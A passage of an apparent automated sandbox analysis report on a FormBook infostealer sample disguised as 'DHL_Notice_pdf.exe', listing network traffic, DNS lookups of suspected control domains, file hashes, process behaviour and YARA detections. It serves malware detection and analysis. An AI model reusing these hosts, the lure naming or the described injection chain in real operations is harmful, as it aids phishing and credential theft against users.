                                                          Mar 21, 2023 08:07:24.635210037 CET4969880192.168.2.31.13.186.125
                                                          Mar 21, 2023 08:07:24.914064884 CET80496981.13.186.125192.168.2.3
                                                          Mar 21, 2023 08:07:24.914180994 CET4969880192.168.2.31.13.186.125
                                                          Mar 21, 2023 08:07:24.914344072 CET4969880192.168.2.31.13.186.125
                                                          Mar 21, 2023 08:07:25.192853928 CET80496981.13.186.125192.168.2.3
                                                          Mar 21, 2023 08:07:25.192886114 CET80496981.13.186.125192.168.2.3
                                                          Mar 21, 2023 08:07:25.193101883 CET4969880192.168.2.31.13.186.125
                                                          Mar 21, 2023 08:07:25.193608046 CET4969880192.168.2.31.13.186.125
                                                          Mar 21, 2023 08:07:25.470067978 CET80496981.13.186.125192.168.2.3
                                                          Mar 21, 2023 08:07:35.689584017 CET4969980192.168.2.3198.46.160.97
                                                          Mar 21, 2023 08:07:35.807986975 CET8049699198.46.160.97192.168.2.3
                                                          Mar 21, 2023 08:07:35.808240891 CET4969980192.168.2.3198.46.160.97
                                                          Mar 21, 2023 08:07:35.808631897 CET4969980192.168.2.3198.46.160.97
                                                          Mar 21, 2023 08:07:35.926683903 CET8049699198.46.160.97192.168.2.3
                                                          Mar 21, 2023 08:07:35.927187920 CET8049699198.46.160.97192.168.2.3
                                                          Mar 21, 2023 08:07:35.927232027 CET8049699198.46.160.97192.168.2.3
                                                          Mar 21, 2023 08:07:35.927345991 CET4969980192.168.2.3198.46.160.97
                                                          Mar 21, 2023 08:07:37.316317081 CET4969980192.168.2.3198.46.160.97
                                                          Mar 21, 2023 08:07:38.332834005 CET4970080192.168.2.3198.46.160.97
                                                          Mar 21, 2023 08:07:38.451946974 CET8049700198.46.160.97192.168.2.3
                                                          Mar 21, 2023 08:07:38.452183008 CET4970080192.168.2.3198.46.160.97
                                                          Mar 21, 2023 08:07:38.452894926 CET4970080192.168.2.3198.46.160.97
                                                          Mar 21, 2023 08:07:38.570954084 CET8049700198.46.160.97192.168.2.3
                                                          Mar 21, 2023 08:07:38.571013927 CET8049700198.46.160.97192.168.2.3
                                                          Mar 21, 2023 08:07:38.571064949 CET8049700198.46.160.97192.168.2.3
                                                          Mar 21, 2023 08:07:38.571118116 CET8049700198.46.160.97192.168.2.3
                                                          Mar 21, 2023 08:07:38.571166992 CET8049700198.46.160.97192.168.2.3
                                                          Mar 21, 2023 08:07:38.571203947 CET4970080192.168.2.3198.46.160.97
                                                          Mar 21, 2023 08:07:38.571327925 CET4970080192.168.2.3198.46.160.97
                                                          Mar 21, 2023 08:07:38.689445019 CET8049700198.46.160.97192.168.2.3
                                                          Mar 21, 2023 08:07:39.957168102 CET4970080192.168.2.3198.46.160.97
                                                          Mar 21, 2023 08:07:40.973077059 CET4970180192.168.2.3198.46.160.97
                                                          Mar 21, 2023 08:07:41.091538906 CET8049701198.46.160.97192.168.2.3
                                                          Mar 21, 2023 08:07:41.091763973 CET4970180192.168.2.3198.46.160.97
                                                          Mar 21, 2023 08:07:41.091881037 CET4970180192.168.2.3198.46.160.97
                                                          Mar 21, 2023 08:07:41.209954977 CET8049701198.46.160.97192.168.2.3
                                                          Mar 21, 2023 08:07:41.210010052 CET8049701198.46.160.97192.168.2.3
                                                          Mar 21, 2023 08:07:41.210052967 CET8049701198.46.160.97192.168.2.3
                                                          Mar 21, 2023 08:07:41.210269928 CET4970180192.168.2.3198.46.160.97
                                                          Mar 21, 2023 08:07:41.210458040 CET4970180192.168.2.3198.46.160.97
                                                          Mar 21, 2023 08:07:41.328169107 CET8049701198.46.160.97192.168.2.3
                                                          Mar 21, 2023 08:07:46.758717060 CET4970280192.168.2.3219.94.129.181
                                                          Mar 21, 2023 08:07:47.058943987 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:47.059135914 CET4970280192.168.2.3219.94.129.181
                                                          Mar 21, 2023 08:07:47.061011076 CET4970280192.168.2.3219.94.129.181
                                                          Mar 21, 2023 08:07:47.360769033 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:47.398175955 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.162316084 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.162358046 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.162380934 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.162405014 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.162431955 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.162456036 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.162482023 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.162507057 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.162525892 CET4970280192.168.2.3219.94.129.181
                                                          Mar 21, 2023 08:07:48.162532091 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.162525892 CET4970280192.168.2.3219.94.129.181
                                                          Mar 21, 2023 08:07:48.162559032 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.162602901 CET4970280192.168.2.3219.94.129.181
                                                          Mar 21, 2023 08:07:48.162622929 CET4970280192.168.2.3219.94.129.181
                                                          Mar 21, 2023 08:07:48.462626934 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.462658882 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.462677002 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.462708950 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.462730885 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.462744951 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.462758064 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.462771893 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.462784052 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.462796926 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.462794065 CET4970280192.168.2.3219.94.129.181
                                                          Mar 21, 2023 08:07:48.462810993 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.462824106 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.462836981 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.462857008 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.462863922 CET4970280192.168.2.3219.94.129.181
                                                          Mar 21, 2023 08:07:48.462878942 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.462898016 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.462907076 CET4970280192.168.2.3219.94.129.181
                                                          Mar 21, 2023 08:07:48.462918043 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.462928057 CET4970280192.168.2.3219.94.129.181
                                                          Mar 21, 2023 08:07:48.462939978 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.462946892 CET4970280192.168.2.3219.94.129.181
                                                          Mar 21, 2023 08:07:48.462986946 CET4970280192.168.2.3219.94.129.181
                                                          Mar 21, 2023 08:07:48.763036966 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.763091087 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.763138056 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.763184071 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.763202906 CET4970280192.168.2.3219.94.129.181
                                                          Mar 21, 2023 08:07:48.763230085 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.763256073 CET4970280192.168.2.3219.94.129.181
                                                          Mar 21, 2023 08:07:48.763283014 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.763330936 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.763338089 CET4970280192.168.2.3219.94.129.181
                                                          Mar 21, 2023 08:07:48.763379097 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.763426065 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.763433933 CET4970280192.168.2.3219.94.129.181
                                                          Mar 21, 2023 08:07:48.763473034 CET8049702219.94.129.181192.168.2.3
                                                          Mar 21, 2023 08:07:48.763521910 CET8049702219.94.129.181192.168.2.3

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Mar 21, 2023 08:07:24.608470917 CET6270453192.168.2.38.8.8.8
                                                          Mar 21, 2023 08:07:24.629987955 CET53627048.8.8.8192.168.2.3
                                                          Mar 21, 2023 08:07:35.665481091 CET4997753192.168.2.38.8.8.8
                                                          Mar 21, 2023 08:07:35.687676907 CET53499778.8.8.8192.168.2.3
                                                          Mar 21, 2023 08:07:46.422673941 CET5784053192.168.2.38.8.8.8
                                                          Mar 21, 2023 08:07:46.707103968 CET53578408.8.8.8192.168.2.3
                                                          Mar 21, 2023 08:07:58.808130026 CET5799053192.168.2.38.8.8.8
                                                          Mar 21, 2023 08:07:58.829898119 CET53579908.8.8.8192.168.2.3
                                                          Mar 21, 2023 08:07:59.838872910 CET5238753192.168.2.38.8.8.8
                                                          Mar 21, 2023 08:07:59.860487938 CET53523878.8.8.8192.168.2.3
                                                          Mar 21, 2023 08:08:00.867115974 CET5692453192.168.2.38.8.8.8
                                                          Mar 21, 2023 08:08:00.889214993 CET53569248.8.8.8192.168.2.3
                                                          Mar 21, 2023 08:08:05.917721033 CET6062553192.168.2.38.8.8.8
                                                          Mar 21, 2023 08:08:06.065783024 CET53606258.8.8.8192.168.2.3
                                                          Mar 21, 2023 08:08:07.086607933 CET4930253192.168.2.38.8.8.8
                                                          Mar 21, 2023 08:08:07.286751986 CET53493028.8.8.8192.168.2.3
                                                          Mar 21, 2023 08:08:08.308490992 CET5397553192.168.2.38.8.8.8
                                                          Mar 21, 2023 08:08:08.328178883 CET53539758.8.8.8192.168.2.3
                                                          Mar 21, 2023 08:08:13.337563992 CET5113953192.168.2.38.8.8.8
                                                          Mar 21, 2023 08:08:13.699300051 CET53511398.8.8.8192.168.2.3
                                                          Mar 21, 2023 08:08:24.633847952 CET5295553192.168.2.38.8.8.8
                                                          Mar 21, 2023 08:08:24.783422947 CET53529558.8.8.8192.168.2.3
                                                          Mar 21, 2023 08:08:35.742198944 CET6058253192.168.2.38.8.8.8
                                                          Mar 21, 2023 08:08:35.790923119 CET53605828.8.8.8192.168.2.3
                                                          Mar 21, 2023 08:08:48.652827978 CET5713453192.168.2.38.8.8.8
                                                          Mar 21, 2023 08:08:48.940431118 CET53571348.8.8.8192.168.2.3
                                                          Mar 21, 2023 08:09:08.449750900 CET6205053192.168.2.38.8.8.8
                                                          Mar 21, 2023 08:09:08.493007898 CET53620508.8.8.8192.168.2.3

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Mar 21, 2023 08:07:24.608470917 CET192.168.2.38.8.8.80x3abbStandard query (0)www.yongleproducts.comA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:07:35.665481091 CET192.168.2.38.8.8.80xae75Standard query (0)www.0dhy.xyzA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:07:46.422673941 CET192.168.2.38.8.8.80x93efStandard query (0)www.kunimi.orgA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:07:58.808130026 CET192.168.2.38.8.8.80x395aStandard query (0)www.amirah.cfdA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:07:59.838872910 CET192.168.2.38.8.8.80x60d8Standard query (0)www.amirah.cfdA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:00.867115974 CET192.168.2.38.8.8.80x1705Standard query (0)www.amirah.cfdA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:05.917721033 CET192.168.2.38.8.8.80xd3d2Standard query (0)www.bisarropainting.comA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:07.086607933 CET192.168.2.38.8.8.80x1bc0Standard query (0)www.bisarropainting.comA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:08.308490992 CET192.168.2.38.8.8.80x2433Standard query (0)www.bisarropainting.comA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:13.337563992 CET192.168.2.38.8.8.80x26afStandard query (0)www.traindic.topA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:24.633847952 CET192.168.2.38.8.8.80x2381Standard query (0)www.bohndigitaltech.comA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:35.742198944 CET192.168.2.38.8.8.80xd55eStandard query (0)www.rifleroofers.comA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:48.652827978 CET192.168.2.38.8.8.80x5b9eStandard query (0)www.denko-kosan.comA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:09:08.449750900 CET192.168.2.38.8.8.80xb9d5Standard query (0)www.madliainsalu.comA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Mar 21, 2023 08:06:50.276381016 CET8.8.8.8192.168.2.30x2211No error (0)windowsupdatebg.s.llnwi.net95.140.230.128A (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:07:24.629987955 CET8.8.8.8192.168.2.30x3abbNo error (0)www.yongleproducts.com1.13.186.125A (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:07:35.687676907 CET8.8.8.8192.168.2.30xae75No error (0)www.0dhy.xyz198.46.160.97A (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:07:46.707103968 CET8.8.8.8192.168.2.30x93efNo error (0)www.kunimi.orgkunimi.orgCNAME (Canonical name)IN (0x0001)false
                                                          Mar 21, 2023 08:07:46.707103968 CET8.8.8.8192.168.2.30x93efNo error (0)kunimi.org219.94.129.181A (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:07:58.829898119 CET8.8.8.8192.168.2.30x395aName error (3)www.amirah.cfdnonenoneA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:07:59.860487938 CET8.8.8.8192.168.2.30x60d8Name error (3)www.amirah.cfdnonenoneA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:00.889214993 CET8.8.8.8192.168.2.30x1705Name error (3)www.amirah.cfdnonenoneA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:06.065783024 CET8.8.8.8192.168.2.30xd3d2Name error (3)www.bisarropainting.comnonenoneA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:07.286751986 CET8.8.8.8192.168.2.30x1bc0Name error (3)www.bisarropainting.comnonenoneA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:08.328178883 CET8.8.8.8192.168.2.30x2433Name error (3)www.bisarropainting.comnonenoneA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:13.699300051 CET8.8.8.8192.168.2.30x26afNo error (0)www.traindic.top162.0.231.77A (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:24.783422947 CET8.8.8.8192.168.2.30x2381No error (0)www.bohndigitaltech.combohndigitaltech.comCNAME (Canonical name)IN (0x0001)false
                                                          Mar 21, 2023 08:08:24.783422947 CET8.8.8.8192.168.2.30x2381No error (0)bohndigitaltech.com162.241.24.110A (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:35.790923119 CET8.8.8.8192.168.2.30xd55eNo error (0)www.rifleroofers.comrifleroofers.comCNAME (Canonical name)IN (0x0001)false
                                                          Mar 21, 2023 08:08:35.790923119 CET8.8.8.8192.168.2.30xd55eNo error (0)rifleroofers.com67.222.24.48A (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:48.940431118 CET8.8.8.8192.168.2.30x5b9eNo error (0)www.denko-kosan.comdenko-kosan.comCNAME (Canonical name)IN (0x0001)false
                                                          Mar 21, 2023 08:08:48.940431118 CET8.8.8.8192.168.2.30x5b9eNo error (0)denko-kosan.com49.212.180.95A (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:09:08.493007898 CET8.8.8.8192.168.2.30xb9d5No error (0)www.madliainsalu.commadliainsalu.comCNAME (Canonical name)IN (0x0001)false
                                                          Mar 21, 2023 08:09:08.493007898 CET8.8.8.8192.168.2.30xb9d5No error (0)madliainsalu.com34.120.137.41A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • www.yongleproducts.com
                                                          • www.0dhy.xyz
                                                          • www.kunimi.org
                                                          • www.traindic.top
                                                          • www.bohndigitaltech.com
                                                          • www.rifleroofers.com
                                                          • www.denko-kosan.com

                                                          Statistics

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:08:06:55
                                                          Start date:21/03/2023
                                                          Path:C:\Users\user\Desktop\DHL_Notice_pdf.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\DHL_Notice_pdf.exe
                                                          Imagebase:0x400000
                                                          File size:255238 bytes
                                                          MD5 hash:771508CF2751F6DABE05758E4FA25FDF
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low

                                                          General

                                                          Target ID:1
                                                          Start time:08:06:55
                                                          Start date:21/03/2023
                                                          Path:C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t
                                                          Imagebase:0x400000
                                                          File size:5632 bytes
                                                          MD5 hash:BE5A6985BCDCA9064A05D26CFB8D082E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 27%, ReversingLabs
                                                          Reputation:low

                                                          General

                                                          Target ID:2
                                                          Start time:08:06:55
                                                          Start date:21/03/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff745070000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:3
                                                          Start time:08:06:56
                                                          Start date:21/03/2023
                                                          Path:C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe
                                                          Imagebase:0x400000
                                                          File size:5632 bytes
                                                          MD5 hash:BE5A6985BCDCA9064A05D26CFB8D082E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          Reputation:low

                                                          General

                                                          Target ID:4
                                                          Start time:08:07:00
                                                          Start date:21/03/2023
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Explorer.EXE
                                                          Imagebase:0x7ff69fe90000
                                                          File size:3933184 bytes
                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:5
                                                          Start time:08:07:10
                                                          Start date:21/03/2023
                                                          Path:C:\Windows\SysWOW64\cmmon32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                                          Imagebase:0xd0000
                                                          File size:36864 bytes
                                                          MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          Reputation:high

                                                          Disassembly

                                                          No disassembly